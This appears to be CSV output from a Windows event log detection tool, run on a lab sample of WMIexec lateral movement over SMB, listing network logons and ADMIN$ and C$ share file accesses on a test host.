2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63564  :  LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63565  :  LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63566  :  LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63567  :  LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63564  :  LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Program Files\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\DesktopTileResources\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Downloaded Program Files\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Fonts\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ImmersiveControlPanel\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\media\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Offline Web Pages\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ToastData\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\ar  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\bg  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\cs  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\da  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\de  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\el  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\en  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\es  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\et  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\fi  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\fr  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\he  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\hr  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\hu  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\it  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\ja  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\ko  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\lt  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\lv  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\nl  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\no  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\pl  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\pt  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\pt-BR  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\ro  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\ru  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
